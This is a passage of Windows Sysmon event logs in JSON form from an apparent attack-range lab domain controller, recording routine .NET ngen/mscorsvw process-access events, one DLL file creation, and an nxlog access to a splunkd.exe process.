07:03:31.482","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C3-5F25-0000-0010DE891100}","TargetProcessId":"3280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9067,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:31.826\r\nProcessGuid: {E2A3D6B1-13C3-5F25-0000-0010DE891100}\r\nProcessId: 3280\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\cd0-0\\System.Runtime.Remoting.dll\r\nCreationUtcTime: 2020-08-01 07:03:31.826","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:31.826","ProcessGuid":"{E2A3D6B1-13C3-5F25-0000-0010DE891100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\cd0-0\\System.Runtime.Remoting.dll","CreationUtcTime":"2020-08-01 07:03:31.826","EventReceivedTime":"2020-08-01 07:03:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9068,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:31.872\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C3-5F25-0000-0010DC8D1100}\r\nTargetProcessId: 1368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:31.872","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C3-5F25-0000-0010DC8D1100}","TargetProcessId":"1368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9069,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:31.872\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C3-5F25-0000-0010DC8D1100}\r\nTargetProcessId: 1368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:31.872","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C3-5F25-0000-0010DC8D1100}","TargetProcessId":"1368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9070,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:31.872\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C3-5F25-0000-0010DC8D1100}\r\nTargetProcessId: 1368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:31.872","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C3-5F25-0000-0010DC8D1100}","TargetProcessId":"1368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9071,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:31.951\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C3-5F25-0000-001085911100}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:31.951","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C3-5F25-0000-001085911100}","TargetProcessId":"2616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9072,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:31.951\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C3-5F25-0000-001085911100}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:31.951","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C3-5F25-0000-001085911100}","TargetProcessId":"2616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9073,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:31.966\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C3-5F25-0000-001085911100}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:31.966","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C3-5F25-0000-001085911100}","TargetProcessId":"2616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9074,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:31.997\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:31.997","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files 